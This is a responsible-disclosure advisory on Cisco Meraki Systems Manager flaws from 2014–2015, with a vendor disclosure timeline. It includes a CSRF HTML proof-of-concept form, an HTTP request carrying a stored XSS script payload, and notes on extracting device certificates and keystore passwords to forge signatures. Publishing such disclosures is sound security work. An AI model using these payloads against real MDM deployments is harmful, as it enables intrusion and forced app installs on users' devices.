(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Cisco Meraki Systems Manager Multiple Vulnerabilities
Affected Versions: Cisco Meraki Systems Manager - Unknown Versions

PDF:
http://www.security-assessment.com/files/documents/advisory/Cisco_Meraki_Systems_Manager_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

The Cisco Meraki Systems Manager system was found to suffer from a number of
vulnerabilities. A Cross Site Request Forgery vulnerability was discovered,
allowing an attacker to determine the registration code for an organisation's
Systems Manager instance or send out spam email. A Stored Cross Site Scripting
vulnerability was discovered, allowing a malicious end user running the
Systems Manager MDM software to stage Cross Site Scripting attacks against the
organisation's administrative users.

The Cisco Meraki Systems Manager administrative console was found to suffer
from a Mass Assignment vulnerability, allowing a malicious user to leverage
the "Backpack" functionality to automatically download and install arbitrary
applications to the end user devices. Additionally, legitimate updates for the
Systems Manager MDM software were found to be shipped over HTTP. This allows
an attacker to intercept and tamper the application package provided they have
access to the network communications somewhere between the client and the
Meraki cloud.


+--------------+
| Exploitation |
+--------------+

--[ Cross Site Request Forgery

The Cisco Meraki System Manager administrative console uses an ‘X-CSRF-Token’
HTTP header to protect against Cross Site Request Forgery attacks, however it
was found that this header is often not validated on the server side and can
simply be omitted. The following POC can be used to coerce an authenticated
user into sending an email containing arbitrary content to an arbitrary
address.

<html>
  <body>
    <form action="https://n85.meraki.com/Systems-Manager/n/Q6mExcvb/manage/configure/pcc_send_mdm_link/">
      <input type="hidden" name="type" value="email" />
      <input type="hidden" name="addr" value="ao367gnae9aer7ghb@mailinator.com" />
      <input type="hidden" name="msg" value="Enroll in Meraki Systems Manager by opening this URL on your Android device:" />
      <input type="hidden" name="platform" value="android" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The CSRF POC on the previous page will send an invitation message to
‘ao367gnae9aer7ghb@mailinator.com’. An attacker may leverage this to enumerate
an organizations registration code and stage further attacks against the
Meraki deployment.

--[ Stored Cross Site Scripting

As Systems Manager relies on a certificate on the mobile device
(provisioned via SCEP during registration) to provide authentication. A
condition was discovered wherein a malicious user can retrieve the relevant
certificate and key and stage attacks against the Systems Manager
administrative console. This lead to a Stored Cross Site Scripting
vulnerability, where a malicious user may send a crafted request to
/android/callback with malicious JavaScript code in the system_model
parameter. The Mdm-Signature header is then recreated by the malicious user
and the payload sent. The Mdm-Signature header can be generated by using a
SpongyCastle content signer to generate a signature for the POST parameter
data.

The following is a request detailing the exploit. The system_model parameter
is the affected field.  The parameter field has been shortened for brevities
sake.

POST /android/callback HTTP/1.1
Mdm-Signature: <Recreated MDM Signature>
Content-Length: <content length>
Content-Type: application/x-www-form-urlencoded
Host: <Meraki Host>
Connection: Keep-Alive

{snip}&system_model=Galaxy+XSS+%3cscript%3ealert(%27Malicious+Javascript%27)%3c%2fscript%3e{snip}

The certificate and key used to create the Mdm-Signature header can be found
under /data/data/com.meraki.sm/files/ on a provisioned Android
device. The password for the keystore is under the ‘scep_keystore_password’
shared preference.

In order to exploit this, the attacker must be registered against the
Meraki MDM instance (in order to have the correct certificate). This requires
the knowledge of a 10 digit enrollment code (xxx-xxx-xxxx). These need to be
brute forced or obtained via other means (invitation email, QR code,
etcetera).

--[ Backpack Mass Assignment

The ‘Backpack’ functionality of the Cisco Meraki Systems Manager can be abused
to install arbitrary APK files on users’ devices. This is achieved by using
mass assignment to define the ‘auto_download’ and ‘auto_install’ flags on a
specific item (in this case an APK file). This is done in the post to
/System-Manager/n/<id>/manage/configure/update_pcc_ios. Further information is
available in the PDF version of this advisory.

It should be noted that the management policy popup on the device disables the
back button once the user is prompted to install the arbitrary APK and access
back into the Meraki Systems manager application cannot be achieved without
tapping the 'install' button.

--[ Updates over HTTP

An attacker with access to network traffic between the device and the
Meraki servers may tamper the APK file used for updating. The update
notification specifies ‘http://dl.meraki.net/androidsm/AndroidSM.apk’ as the
document_url of the update. When an update is available, the
http://dl.meraki.com URL is requested by the application. 

+----------+
| Solution |
+----------+

The Cisco Meraki Systems Manager cloud has been patched as deemed appropriate by Cisco.

+---------------------+
| Disclosure Timeline |
+---------------------+

13/10/2014 -  Initial Advisory Sent to security@meraki.com
14/10/2014 -  Response from Cisco acknowledging the advisory documents and
    confirming the Updates over HTTP vulnerability.
14/10/2014 -  Response from Cisco stating that "The ability to require the
    download and installation of APK (and other files) is a feature of MDM
    Administration, and does not on its own constitute a
    vulnerability." In regards to the Mass Assignment vulnerability. Remaining
    vulnerabilities acknowledged and more information requested.
17/10/2014 -  Additional information sent to Cisco, as requested.
30/10/2014 -  Request for Update
30/10/2014 -  Response stating the Cross Site Request Forgery and Cross Site
    Scripting vulnerabilities were resolved
29/01/2015 -  Advisory Release

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security 
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the 
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, 
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650